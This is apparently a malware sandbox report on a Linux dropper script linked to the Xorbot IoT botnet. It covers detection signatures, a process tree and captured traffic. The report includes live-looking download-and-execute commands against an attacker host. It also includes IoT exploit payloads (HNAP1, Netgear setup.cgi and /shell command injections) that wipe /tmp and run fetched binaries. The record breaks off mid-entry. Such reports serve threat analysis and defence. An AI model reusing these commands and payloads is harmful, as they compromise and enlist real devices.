Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    28/02/2025, 19:33 UTC

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    0d6abf13920f9568901114a1d17cdfd6

  • SHA1

    8f51702b2844fafb5952fa36d21c2b47de532b5f

  • SHA256

    7c0a391f5ce85b25149f47e7cdce3f47658ea8439a5d487d05833573f20ff9cb

  • SHA512

    0e8c146bd5d415028be102875ebb16d2b898f3923252b11cfeb179fd58a8ef36a54772709f514d6297449e8fdb4246740084f9ed93dad9bdd675905cdf67b795

  • SSDEEP

    192:RdZtmvfC3A3k3x3+3e3LjHkJpgL5d5l5uFpY90cva22sYaGiQa3vvLCLuLzm+v0q:RdZtmvfC3A3k3x3+3e3LjHkJpgLHzJ9p

Malware Config

Signatures

  • Detects Xorbot 5 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • Contacts a large (1748) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 5 IoCs
  • Renames itself 1 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 5 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 18 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 12 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    PID:647
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:649
      • /usr/bin/wget
        wget http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:651
      • /usr/bin/curl
        curl -O http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
        2⤵
        • Checks CPU configuration
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:667
      • /bin/busybox
        /bin/busybox wget http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:677
      • /bin/chmod
        chmod 777 tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
        2⤵
        • File and Directory Permissions Modification
        PID:679
      • /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
        ./tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
        2⤵
          PID:680
        • /bin/rm
          rm tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
          2⤵
            PID:682
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:683
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
            2⤵
            • Checks CPU configuration
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:684
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
            2⤵
            • System Network Configuration Discovery
            PID:697
          • /bin/chmod
            chmod 777 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
            2⤵
            • File and Directory Permissions Modification
            PID:734
          • /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
            ./59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
            2⤵
              PID:735
            • /bin/rm
              rm 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
              2⤵
                PID:737
              • /usr/bin/wget
                wget http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:738
              • /usr/bin/curl
                curl -O http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                2⤵
                • Checks CPU configuration
                • Reads runtime system information
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:739
              • /bin/busybox
                /bin/busybox wget http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:771
              • /bin/chmod
                chmod 777 l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                2⤵
                • File and Directory Permissions Modification
                PID:772
              • /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                ./l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                2⤵
                  PID:773
                • /bin/rm
                  rm l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                  2⤵
                    PID:775
                  • /usr/bin/wget
                    wget http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
                    2⤵
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:776
                  • /usr/bin/curl
                    curl -O http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
                    2⤵
                    • Checks CPU configuration
                    • System Network Configuration Discovery
                    • Writes file to tmp directory
                    PID:777
                  • /bin/busybox
                    /bin/busybox wget http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
                    2⤵
                    • System Network Configuration Discovery
                    PID:779
                  • /bin/chmod
                    chmod 777 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
                    2⤵
                    • File and Directory Permissions Modification
                    PID:780
                  • /tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
                    ./1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
                    2⤵
                      PID:781
                    • /bin/rm
                      rm 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
                      2⤵
                        PID:783
                      • /usr/bin/wget
                        wget http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
                        2⤵
                        • System Network Configuration Discovery
                        • Writes file to tmp directory
                        PID:784
                      • /usr/bin/curl
                        curl -O http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
                        2⤵
                        • Checks CPU configuration
                        • System Network Configuration Discovery
                        • Writes file to tmp directory
                        PID:787
                      • /bin/busybox
                        /bin/busybox wget http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
                        2⤵
                        • System Network Configuration Discovery
                        PID:789
                      • /bin/chmod
                        chmod 777 z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
                        2⤵
                        • File and Directory Permissions Modification
                        PID:790
                      • /tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
                        ./z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
                        2⤵
                        • Renames itself
                        • Reads runtime system information
                        • System Network Configuration Discovery
                        PID:791
                        • /bin/sh
                          sh -c "crontab -l"
                          3⤵
                            PID:793
                            • /usr/bin/crontab
                              crontab -l
                              4⤵
                                PID:794
                            • /bin/sh
                              sh -c "crontab -"
                              3⤵
                                PID:795
                                • /usr/bin/crontab
                                  crontab -
                                  4⤵
                                  • Creates/modifies Cron job
                                  PID:796
                            • /bin/rm
                              rm z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
                              2⤵
                              • System Network Configuration Discovery
                              PID:798
                            • /usr/bin/wget
                              wget http://conn.masjesu.zip/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX
                              2⤵
                              • System Network Configuration Discovery
                              PID:801

                          Network

                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G HTTP/1.1
                            User-Agent: Wget/1.18 (linux-gnueabihf)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: conn.masjesu.zip
                            Connection: Keep-Alive
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:15 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 109733
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:31 GMT
                            ETag: "67c2022f-1aca5"
                            X-Cache-Status: MISS
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G HTTP/1.1
                            Host: conn.masjesu.zip
                            User-Agent: curl/7.52.1
                            Accept: */*
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:16 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 109733
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:31 GMT
                            ETag: "67c2022f-1aca5"
                            X-Cache-Status: HIT
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G HTTP/1.1
                            Host: conn.masjesu.zip
                            User-Agent: Wget
                            Connection: close
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:16 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 109733
                            Connection: close
                            Last-Modified: Fri, 28 Feb 2025 18:36:31 GMT
                            ETag: "67c2022f-1aca5"
                            X-Cache-Status: HIT
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv HTTP/1.1
                            User-Agent: Wget/1.18 (linux-gnueabihf)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: conn.masjesu.zip
                            Connection: Keep-Alive
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:17 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 120808
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:32 GMT
                            ETag: "67c20230-1d7e8"
                            X-Cache-Status: MISS
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv HTTP/1.1
                            Host: conn.masjesu.zip
                            User-Agent: curl/7.52.1
                            Accept: */*
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:18 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 120808
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:32 GMT
                            ETag: "67c20230-1d7e8"
                            X-Cache-Status: HIT
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E HTTP/1.1
                            User-Agent: Wget/1.18 (linux-gnueabihf)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: conn.masjesu.zip
                            Connection: Keep-Alive
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:22 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 101654
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:32 GMT
                            ETag: "67c20230-18d16"
                            X-Cache-Status: MISS
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E HTTP/1.1
                            Host: conn.masjesu.zip
                            User-Agent: curl/7.52.1
                            Accept: */*
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:28 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 101654
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:32 GMT
                            ETag: "67c20230-18d16"
                            X-Cache-Status: HIT
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E HTTP/1.1
                            Host: conn.masjesu.zip
                            User-Agent: Wget
                            Connection: close
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:28 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 101654
                            Connection: close
                            Last-Modified: Fri, 28 Feb 2025 18:36:32 GMT
                            ETag: "67c20230-18d16"
                            X-Cache-Status: HIT
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki HTTP/1.1
                            User-Agent: Wget/1.18 (linux-gnueabihf)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: conn.masjesu.zip
                            Connection: Keep-Alive
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:29 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 114267
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:33 GMT
                            ETag: "67c20231-1be5b"
                            X-Cache-Status: MISS
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki HTTP/1.1
                            Host: conn.masjesu.zip
                            User-Agent: curl/7.52.1
                            Accept: */*
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:29 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 114267
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:33 GMT
                            ETag: "67c20231-1be5b"
                            X-Cache-Status: HIT
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr HTTP/1.1
                            User-Agent: Wget/1.18 (linux-gnueabihf)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: conn.masjesu.zip
                            Connection: Keep-Alive
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:34 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 144869
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:34 GMT
                            ETag: "67c20232-235e5"
                            X-Cache-Status: MISS
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                          • flag-fr
                            GET
                            http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr HTTP/1.1
                            Host: conn.masjesu.zip
                            User-Agent: curl/7.52.1
                            Accept: */*
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:35 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 144869
                            Connection: keep-alive
                            Last-Modified: Fri, 28 Feb 2025 18:36:34 GMT
                            ETag: "67c20232-235e5"
                            X-Cache-Status: HIT
                            Accept-Ranges: bytes
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                          • flag-fr
                            GET
                            http://37.44.238.88/.shell
                            Remote address:
                            37.44.238.88:80
                            Request
                            GET /.shell HTTP/1.1
                            Host: 37.44.238.88
                            Connection: close
                            Response
                            HTTP/1.1 200 OK
                            Server: nginx/1.22.1
                            Date: Fri, 28 Feb 2025 19:33:42 GMT
                            Content-Type: text/plain; charset=utf-8
                            Content-Length: 208
                            Connection: close
                            server-timing: cfL4;desc="?proto=TCP&rtt=1888&min_rtt=1770&rtt_var=901&sent=3&recv=6&lost=0&retrans=0&sent_bytes=139&recv_bytes=571&delivery_rate=532352&cwnd=250&unsent_bytes=0&cid=2d0f9e4f6658bcf1&ts=49&x=0"
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN A
                            Response
                            conn.masjesu.zip
                            IN A
                            216.126.231.240
                            conn.masjesu.zip
                            IN A
                            37.44.238.88
                          • flag-au
                            DNS
                            conn.masjesu.zip
                            Remote address:
                            1.1.1.1:53
                            Request
                            conn.masjesu.zip
                            IN AAAA
                            Response
                          • flag-us
                            GET
                            http://104.24.157.51:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Remote address:
                            104.24.157.51:80
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 104.24.157.51:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.1 403 Forbidden
                            Date: Fri, 28 Feb 2025 19:33:42 GMT
                            Content-Type: text/plain; charset=UTF-8
                            Content-Length: 16
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Referrer-Policy: same-origin
                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                            Server: cloudflare
                            CF-RAY: 9192d90e5b949415-LHR
                          • flag-us
                            POST
                            http://104.24.157.51:80/HNAP1/
                            Remote address:
                            104.24.157.51:80
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 104.24.157.51:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                            Response
                            HTTP/1.1 403 Forbidden
                            Date: Fri, 28 Feb 2025 19:33:42 GMT
                            Content-Type: text/plain; charset=UTF-8
                            Content-Length: 16
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Referrer-Policy: same-origin
                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                            Server: cloudflare
                            CF-RAY: 9192d90e5e9c63c5-LHR
                          • flag-us
                            GET
                            http://104.24.157.51:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Remote address:
                            104.24.157.51:80
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.1 400 Bad Request
                            Date: Fri, 28 Feb 2025 19:33:42 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            Server: cloudflare
                            CF-RAY: 9192d90e5b7b9547-LHR
                          • flag-us
                            POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Remote address:
                            104.24.157.51:80
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.1 403 Forbidden
                            Date: Fri, 28 Feb 2025 19:33:42 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Frame-Options: SAMEORIGIN
                            Referrer-Policy: same-origin
                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                            Vary: Accept-Encoding
                            Server: cloudflare
                            CF-RAY: 9192d90e6ca294ea-LHR
                            Content-Encoding: gzip
                          • flag-us
                            GET
                            http://104.24.157.51:8080/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Remote address:
                            104.24.157.51:8080
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.1 400 Bad Request
                            Date: Fri, 28 Feb 2025 19:33:43 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            Server: cloudflare
                            CF-RAY: 9192d911d9bf8ae0-LHR
                          • flag-us
                            POST
                            http://127.0.0.1:8080/GponForm/diag_Form?images/
                            Remote address:
